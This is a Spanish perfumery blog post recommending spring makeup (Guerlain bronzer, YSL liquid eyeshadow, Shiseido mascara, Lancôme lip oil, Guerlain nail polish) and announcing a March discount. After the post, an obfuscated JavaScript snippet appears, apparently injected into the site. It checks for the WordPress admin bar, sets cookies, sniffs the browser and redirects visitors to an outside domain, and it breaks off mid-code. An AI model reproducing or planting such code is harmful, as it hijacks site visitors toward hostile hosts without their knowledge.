Bienvenida (4)

Ya estamos oficialmente en Primavera la estación de las flores y del color por la excelencia.

Por ello desde Perfumerías Tin Tin queremos celebrarlo con maravillosos descuentos en productos de color de maquillaje.

Te sugerimos 5 productos para llevar en tu neceser esta primavera.

Para rostro:

Consigue un bronceado natural con los polvos Terracotta Jolie Teint de Guerlain. Ideal para aplicar tras la aplicación de nuestra base de maquillaje o BB Cream. Conseguiremos una piel luminosa como si volviéramos de disfrutar de unas vacaciones en la costa. Por un lado encontramos un polvo bronceador que nos ayudará a incrementar la duración de nuestro maquillaje. Su textura ultrafina no reseca la piel. Por otro lado incluye un precioso polvo que sobre las mejillas nos aporta un aspecto saludable. Disponible en tres tonos se convertirá en un básico en tu neceser.

guerlain-terracotta-joli-teint-poudre

Para ojos:

Un producto ultracómodo con el que aplicarte sombras sea cuestión de segundos. Descubre las sombras de ojos Full Metal Shadow de Yves Saint Laurent. Se tratan de las primeras sombras líquidas con acabado metalizado de la firma. Full Metal Shadow  de Yves Saint Laurent son sombras de larga duración que prometen un acabado de hasta 16 horas sin pliegues. En su fórmula encontramos un 40% de agua pura y un 30%  de pigmento y nácares, un punto fuerte que no podemos dejar pasar.  Cualquiera de sus 10 tonalidades son preciosas e ideales y perfectos para conseguir looks espectaculares.

yves-saint-laurent-full-metal-shadow

¿Que sería de la mirada sin la máscara de pestañas? Shiseido nos propone su máscara de pestañas Full Lash Volume da volumen y alarga las pestañas con la exclusiva tecnología de aplicación de su Full Expression Brush. Este cepillo fue diseñado y patentado en Japón para impulsar el volumen de cada pestaña y darle más grosor, longitud y estructura.  Además puedes aplicarla capa sobre capa sin que tu maquillaje se sienta pesado, se creen grumos o que las pestañas se vengan abajo. Full Lash Volume Mascara disponible en dos tonos: negro y marrón. Además su fórmula es apta para aquellas personas con ojos sensibles pues no tiene fragancia y está testada por oftalmólogos.

shiseido-full-lash-volume-mascara

Para labios:

Lancôme presenta de la mano de la prestigiosa maquilladora Lisa Eldridge un nuevo concepto para los labios. Juicy Shakers de Lancôme son una especie de brillo de labios fruto de la combinación de aceites con pigmentos que proporcionan hidratación además de un color precioso. Su envase super original emula una coctelera, y es que en la parte de abajo del envase se depositan los aceites y en suspensión los pigmentos, por ello antes de cada aplicación deberemos agitarlo bien.  Al tratarse de aceite no deja los labios nada pegajosos, lo aplicaremos suavemente con su esponjita aplicador. Encontramos 14 maravillosos tonos que harán las delicias de nuestros labios.

lancome-juicy-shaker

Para uñas:

Guerlain nos propone con su nueva línea de esmaltes de La Petite Robe Noir para conseguir un look parisino. Cuenta con 8 tonos preciosos para esta primavera llenas de brillo con una larga duración con el aroma de su emblemático perfume La Petite Robe Noir de Guerlain.

guerlain-la-petite-robe-noire

 

Desde hoy 23 de Marzo y hasta el 29 de Marzo encontraréis entre un 20-30% de descuento en maquillaje. Sin importe mínimo de compra, sin incluir los productos de la sección ofertas.

Cuéntanos, ¿te maquillas con más colorido en primavera?

 

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone